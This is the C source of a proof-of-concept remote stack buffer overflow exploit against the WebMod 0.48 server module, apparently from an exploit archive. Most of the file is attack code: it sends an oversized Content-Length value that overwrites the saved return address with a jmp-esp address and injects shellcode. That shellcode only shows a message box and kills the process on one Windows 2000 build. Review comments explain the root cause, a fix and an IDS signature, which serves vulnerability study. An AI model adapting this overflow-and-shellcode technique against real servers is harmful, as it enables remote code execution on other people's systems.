WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC
=============================================================== WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC ===============================================================
/*
 * WebMod Stack Buffer Overflow
 *
 * by cybermind (Kevin Masterson)
 * cybermind@gmail.com
 *
 * WebMod v0.48 exploit PoC code
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock.h>
#pragma comment (lib, "ws2_32.lib")

/*
 * Review notes (defender's view of what this PoC demonstrates):
 *
 * The server-side routine connectHandle() keeps ~158 KB of locals on the
 * stack (layout below). The client sends a Content-Length header whose value
 * is 158308 filler bytes followed by a 4-byte return address and a payload;
 * the value is evidently copied into a fixed-size local without a length
 * check, so the copy runs through every local up to the saved return address.
 * Which local receives the copy is not shown here -- presumably clbuf[11],
 * the only Content-Length-sized buffer -- confirm against the WebMod source.
 *
 * Root cause / fix on the server side: bound the copy of every header value
 * (snprintf or an explicit length compare against sizeof the destination) and
 * reject a Content-Length that is not a short, purely numeric field.
 * Detection: an HTTP request line or header line of this length (>100 KB,
 * non-numeric Content-Length) is trivially anomalous for a game-server HTTP
 * module and is a reasonable signature for an IDS/WAF rule.
 *
 * The payload relies on fixed absolute addresses (see the comments on code[]
 * and our_eip); address randomization and a non-executable stack would break
 * this particular return-into-jmp-esp technique, and stack cookies would
 * catch the overwrite before the return -- all standard hardening for
 * native network services.
 */

/*
local variables in connectHandle():
char *input;            4
char buf[8192+1];       8193
int i,j;                8
int connfd;             4
int myid;               4
threaddata_t *tdata;    4
httpquery_t query;      149036
char tmp[1025];         1025
int rcv;                4
char clbuf[11];         11
total:                  158293
actual (due to padding): 158308

breakdown of types:
typedef struct s_var {          546
    char name[33];              33
    char value[513];            513
} var_s;

typedef struct s_httpquery {    149036
    char method[11];            11
    char clientip[16];          16
    char url[257];              257
    char *get;                  4
    char *post;                 4
    char *cookies;              4
    var_s vars[256];            139776
    char currentmapname[257];   257
    char sendcookies[8192+1];   8193
    char contenttype[257];      257
    char location[257];         257
} httpquery_t;
*/

//contains data to fill the Content-Length field with
//(20000 bytes of 'a'; 7 full sends + one partial send below add up to the
// 158308-byte local area listed above)
char spambuf[20000];

//code to inject
//this particular code only works on Win2K SP4 (v5.0.4.0)
//and kernel32.dll v5.0.2195.6688
//All three calls below go through absolute, version-specific addresses
//(no import resolution), which is why the payload is tied to one exact
//OS/DLL build. The payload only pops a message box and then terminates the
//process it runs in.
unsigned char code[] = {
    // ; push string onto the stack without using 0x00
    0xB8, 0x59, 0x5A, 0x32, 0x11,   //mov eax, 11325A59h ; "HI!\0" + 11111111h
    0x2D, 0x11, 0x11, 0x11, 0x11,   //sub eax, 11111111h
    0x50,                           //push eax
    0x8B, 0xC4,                     //mov eax, esp ; eax points to string
    0x33, 0xC9,                     //xor ecx, ecx ; zero
    // ; call MessageBox
    0x51,                           //push ecx ; flags (0)
    0x50,                           //push eax ; caption
    0x50,                           //push eax ; text
    0x51,                           //push ecx ; hwnd (0)
    0xB8, 0x98, 0x80, 0xE3, 0x77,   //mov eax, 77E38098h ; &MessageBox
    0xFF, 0xD0,                     //call eax
    // ; call GetCurrentProcessId
    0xB8, 0xF4, 0xB8, 0x4E, 0x7C,   //mov eax, 7C4EB8F4h ; &GetCurrentProcessId
    0xFF, 0xD0,                     //call eax
    0x33, 0xC9,                     //xor ecx, ecx ; zero
    // ; call TerminateProcess
    0x51,                           //push ecx ; return code (0)
    0x50,                           //push eax ; process id
    0xB8, 0xC3, 0x8D, 0x51, 0x7C,   //mov eax, 7C518DC3h ; &TerminateProcess
    0xFF, 0xD0                      //call eax
};

//EIP you want to insert, this points to an "FF E4" (jmp esp) in w_mm.dll
//set this to 0xFFFFFFFF to just cause a crash
//Sent raw (little-endian) straight after the 158308 filler bytes, so it lands
//on the saved return address of connectHandle().
unsigned int our_eip = 0x67E03C5B;

// Entry point: connects to <hostname>:<port> (default 27015) over TCP and
// writes one oversized POST request: headers up to "Content-Length: ",
// 158308 filler bytes, our_eip, code[], then "\n\n". Returns 1 on any
// socket/resolver failure, 0 after the request is written.
int main(int argc, char* argv[])
{
    WSADATA wsadata;
    int sock = 0;
    struct hostent* host = NULL;
    struct sockaddr_in saddr;
    //data to sent initially
    char initbuf[] = "POST / HTTP/1.1\nHost: localhost:27015\nContent-Length: ";
    //data to send after headers
    char endbuf[] = "\n\n";
    char* hostname = NULL;
    short hostport = 27015;
    int i;
    unsigned int sent = 0;

    //get host/port from command line
    if (argc < 2)
    {
        printf("Usage:\t%s <hostname|ip> [port=27015]\n", argv[0]);
        return 1;
    }
    hostname = argv[1];
    //NOTE(review): atoi() gives no error indication; a non-numeric port
    //silently becomes 0.
    if (argc >= 3)
        hostport = atoi(argv[2]);

    //NOTE(review): WSAStartup() result is not checked; later calls fail
    //with an unhelpful message if it did not succeed.
    WSAStartup(MAKEWORD(1,1), &wsadata);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock <= 0)
    {
        printf("socket() error\n");
        return 1;
    }
    host = gethostbyname(hostname);
    if (!host)
    {
        printf("gethostbyname() error\n");
        return 1;
    }
    printf("Resolved \"%s\" to %s\n", hostname, inet_ntoa(*(struct in_addr*)host->h_addr_list[0]));
    memset(&saddr, 0, sizeof(struct sockaddr_in));
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons(hostport);
    memcpy(&saddr.sin_addr.s_addr, host->h_addr_list[0], host->h_length);
    if (connect(sock, (struct sockaddr*)&saddr, sizeof(struct sockaddr)) < 0)
    {
        printf("connect() error\n");
        return 1;
    }

    //initialize buffers
    memset(spambuf, 'a', sizeof(spambuf));

    //NOTE(review): none of the send() results below are checked; a
    //SOCKET_ERROR (-1) return is added to the unsigned byte count and the
    //"bytes sent" figure printed at the end is then meaningless.
    //send initial POST request
    sent += send(sock, initbuf, sizeof(initbuf)-1, 0);
    //send 7 full spambufs to get 140000 bytes
    for (i = 0; i < 7; ++i)
        sent += send(sock, spambuf, sizeof(spambuf), 0);
    //send partial spambuf to fill remaining data
    //(18308, this goes right up to the EIP)
    sent += send(sock, spambuf, 18308, 0);
    //fill EIP
    sent += send(sock, (char*)&our_eip, sizeof(our_eip), 0);
    //insert code!
    sent += send(sock, (char*)code, sizeof(code), 0);
    //send newlines after content-length
    sent += send(sock, endbuf, sizeof(endbuf)-1, 0);
    printf("%u bytes sent...waiting...\n", sent);
    //wait for a while so the socket isn't closed on our end
    //before they receive all the data
    //(no closesocket()/WSACleanup(); the process exit releases the socket)
    Sleep(15000);
    return 0;
}
# 0day.today [2024-12-25] #